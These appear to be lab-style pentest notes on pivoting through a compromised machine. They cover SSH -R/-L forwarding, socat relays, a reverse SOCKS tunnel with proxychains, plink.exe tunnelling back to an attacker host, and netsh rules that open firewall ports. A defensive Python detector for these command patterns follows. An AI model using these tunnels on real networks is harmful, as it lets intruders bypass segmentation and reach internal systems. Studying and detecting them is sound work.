Networking
Port Forwarding for exploits
Attacker Machine -> Pivot Machine -> Victim Machine
SSH Remote Port Forwarding
On the Pivot Machine, this makes port 3389 on the Victim Machine reachable on port 1234 of the attacker machine: connections to 127.0.0.1:1234 on the attacker are carried back through the SSH tunnel and the Pivot connects them to VICTIM:3389
C:\> ssh tunneluser@ATTACKER -R 1234:VICTIM:3389 -N
SSH Local Port Forwarding
On the Pivot Machine, add the following firewall rule
netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow protocol=TCP localport=80
On the Pivot Machine, this exposes port 8001 of the attacker machine on port 80 of the Pivot Machine: anything that connects to the Pivot on port 80 is tunnelled to 127.0.0.1:8001 on the attacker
C:\> ssh tunneluser@ATTACKER -L *:80:127.0.0.1:8001 -N
Socat portforwarding
On the Pivot Machine, add the following firewall rule
netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389
On the Pivot Machine, to relay connections from the Attacker Machine to the Victim Machine (the Pivot listens on port 3389 and hands each connection to VICTIM:3389, where VICTIM is the Victim Machine's address)
C:\> socat TCP4-LISTEN:3389,fork TCP4:VICTIM:3389
On the Pivot Machine, to relay connections from the Victim Machine to the Attacker Machine (the Pivot listens on port 80 and hands each connection to ATTACKER:80)
C:\> socat TCP4-LISTEN:80,fork TCP4:ATTACKER:80
SOCKS
On the Pivot Machine
C:\\> ssh tunneluser@ATTACKER -R 9050 -N
On the Attacker Machine, set up proxychains by adding the SOCKS listener created above in /etc/proxychains.conf:
[ProxyList]
socks4 127.0.0.1 9050
On the Attacker Machine, prefix commands with proxychains so that their traffic is sent to port 9050, which the SSH tunnel carries to the Pivot Machine; the Pivot then makes the actual connection to the destination
$ proxychains curl http://pxeboot.za.tryhackme.com
plink.exe
Assuming you already have a shell on the victim machine, we can use plink.exe on the victim machine to forward traffic from the attacker machine into the other internal networks reachable from the victim
> .\plink.exe root@<attacker IP> -R <attacker port>:127.0.0.1:<victim port>
This creates an SSH connection to our attacker machine as root, and any traffic sent to <attacker port> on the attacker machine is forwarded through the tunnel to <victim port> on 127.0.0.1 of the victim
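As an added example (not part of these notes and not one of the commands above), the following Python detector takes the defender's view of the ssh, plink.exe and socat patterns shown in the SSH, socat and plink.exe sections: run over process-creation command lines from a host, it flags each forwarding or relay construct and resolves which side listens and where the connections end up, which is exactly the point that makes -L and -R easy to confuse. The command lines and addresses in SAMPLE_CMDLINES are constructed samples.

```python
import re

# Constructed sample command lines, shaped like a pivot host's process-creation
# telemetry (e.g. Sysmon event 1); addresses are placeholders, not this page's hosts.
SAMPLE_CMDLINES = [
    "ssh tunneluser@10.50.1.1 -R 1234:10.200.1.30:3389 -N",
    "ssh tunneluser@10.50.1.1 -L *:80:127.0.0.1:8001 -N",
    "ssh tunneluser@10.50.1.1 -R 9050 -N",
    r"C:\Users\svc\plink.exe root@10.50.1.1 -R 8080:127.0.0.1:8080",
    "ssh admin@fileserver.corp -p 2222",
    "socat TCP4-LISTEN:3389,fork TCP4:10.200.1.30:3389",
]

def explain_forward(flag, spec):
    """Resolve an ssh/plink -L/-R/-D spec: 'client' is the host running ssh (the pivot),
    'server' is the SSH server; returns who listens and where connections end up."""
    parts = spec.split(":")
    if flag == "-D" or (flag == "-R" and len(parts) == 1):  # SOCKS; bare -R port = reverse SOCKS
        return {"kind": "socks", "listener": "client" if flag == "-D" else "server",
                "listen": f"localhost:{parts[0]}", "target": "any"}
    if len(parts) == 3:                    # port:host:hostport -> bind defaults to loopback
        parts = ["localhost"] + parts
    if len(parts) != 4:
        return None
    bind, port, host, hostport = parts
    return {"kind": "local" if flag == "-L" else "remote",
            "listener": "client" if flag == "-L" else "server",
            "listen": f"{bind}:{port}", "target": f"{host}:{hostport}"}

def scan_cmdline(cmdline):
    """Return one finding per forwarding or relay construct in a process command line."""
    tokens = cmdline.split()
    tool = tokens[0].replace("\\", "/").rsplit("/", 1)[-1].lower() if tokens else ""
    findings = []
    if tool in ("ssh", "plink", "plink.exe"):
        for i, tok in enumerate(tokens[:-1]):
            if tok in ("-L", "-R", "-D"):
                info = explain_forward(tok, tokens[i + 1])
                if info:
                    findings.append({"tool": tool, **info})
    elif tool == "socat":                  # listener relayed to a fixed destination
        listen = re.search(r"TCP4?-LISTEN:(\d+)", cmdline)
        target = re.search(r"\bTCP4?:([^,\s:]+):(\d+)", cmdline)
        if listen and target:
            findings.append({"tool": tool, "kind": "relay", "listener": "client",
                             "listen": f"*:{listen.group(1)}", "target": f"{target.group(1)}:{target.group(2)}"})
    return findings

def scan_all(cmdlines):
    # Flatten findings across a batch of command lines; an empty list means nothing was flagged.
    return [f for c in cmdlines for f in scan_cmdline(c)]
```

Feeding a host's real process telemetry through scan_all in place of SAMPLE_CMDLINES gives one record per tunnel, with the remote-forward and SOCKS findings being the ones a pivot host should never normally produce.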